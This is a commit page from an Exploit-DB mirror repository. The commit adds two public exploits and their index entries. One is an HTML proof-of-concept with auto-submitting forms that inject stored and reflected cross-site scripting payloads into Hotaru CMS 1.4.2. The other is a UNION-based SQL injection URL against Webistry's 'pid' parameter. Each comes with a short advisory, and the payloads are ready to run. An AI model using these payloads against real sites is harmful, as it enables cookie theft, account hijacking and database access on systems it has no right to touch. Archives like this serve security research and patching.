bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Update: 2015-03-10

Browse source 
2 new exploits
This commit is contained in:
Offensive Security 2015-03-10 08:35:33 +00:00
parent 65bae5bbd0
commit 22f053cf5e
3 changed files with 60 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
files.csv
View file

@ -32724,3 +32724,5 @@ id,file,description,date,author,platform,type,port
36302,platforms/php/webapps/36302.txt,"Joomla Content Component 'year' Parameter SQL Injection Vulnerability",2011-11-14,E.Shahmohamadi,php,webapps,0
36303,platforms/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection Vulnerability",2015-03-06,"ITAS Team",php,webapps,80
36304,platforms/windows/remote/36304.rb,"HP Data Protector 8.10 Remote Command Execution",2015-03-06,metasploit,windows,remote,5555
36307,platforms/php/webapps/36307.html,"Search Plugin for Hotaru CMS 1.4.2 admin_index.php SITE_NAME Parameter XSS",2011-11-13,"Gjoko Krstic",php,webapps,0
36308,platforms/php/webapps/36308.txt,"Webistry 1.6 'pid' Parameter SQL Injection Vulnerability",2011-11-16,CoBRa_21,php,webapps,0

Can't render this file because it is too large.

49
platforms/php/webapps/36307.html Executable file
View file

@ -0,0 +1,49 @@
source: http://www.securityfocus.com/bid/50657/info
Hotaru CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Hotaru CMS 1.4.2 is vulnerable; other versions may also be affected.
<html>
<title>Hotaru CMS 1.4.2 SITE_NAME Parameter Stored XSS Vulnerability</title>
<body bgcolor="#1C1C1C">
<script type="text/javascript">
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
</script><br />
<form action="http://localhost/hotaru-1-4-2/admin_index.php?page=settings" enctype="application/x-www-form-urlencoded" method="POST" id="xss1">
<input type="hidden" name="SITE_OPEN" value="true" />
<input type="hidden" name="SITE_NAME" value='"><script>alert(1)</script>' />
<input type="hidden" name="THEME" value="default/" />
<input type="hidden" name="ADMIN_THEME" value="admin_default/" />
<input type="hidden" name="DEBUG" value="true" />
<input type="hidden" name="FRIENDLY_URLS" value="false" />
<input type="hidden" name="DB_CACHE" value="false" />
<input type="hidden" name="CSS_JS_CACHE" value="true" />
<input type="hidden" name="HTML_CACHE" value="true" />
<input type="hidden" name="LANG_CACHE" value="true" />
<input type="hidden" name="RSS_CACHE" value="true" />
<input type="hidden" name="SITE_EMAIL" value="lab@zeroscience.mk" />
<input type="hidden" name="SMTP" value="false" />
<input type="hidden" name="SMTP_HOST" value="mail.zeroscience.mk" />
<input type="hidden" name="SMTP_PORT" value="25" />
<input type="hidden" name="SMTP_USERNAME" value="" />
<input type="hidden" name="SMTP_PASSWORD" value="" />
<input type="hidden" name="settings_update" value="true" />
<input type="hidden" name="csrf" value="48202665ee5176f8a813e4a865381f02" /></form>
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><center><h3>SITE_NAME Param</h3></center></font></b></a><br />
<form action="http://localhost/hotaru-1-4-2/index.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss2">
<input type="hidden" name="csrf" value="83405717529ac232d387c8df3cdb01d1" />
<input type="hidden" name="page" value="login" />
<input type="hidden" name="password" value="" />
<input type="hidden" name="remember" value="1" />
<input type="hidden" name="return" value="%22%20onmouseover%3dprompt%28111%29%20bad%3d%22" />
<input type="hidden" name="username" value="" /></form>
<a href="javascript: xss2();" style="text-decoration:none">
<b><font color="red"><center><h3>return Param</h3></center></font></b></a><br />
<a href="http://localhost/hotaru-1-4-2/index.php?search=%22%20onmouseover%3dprompt%28111%29%20bad%3d%22" style="text-decoration:none">
<b><font color="red"><center><h3>search Param</h3></center></font></b></a></body>
</html>

9
platforms/php/webapps/36308.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50689/info
Webistry is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Webistry 1.0 is vulnerable; other versions may also be affected.
http://www.example.com /index.php?pid=14 union select 0,1,2,3,version(),5,6,7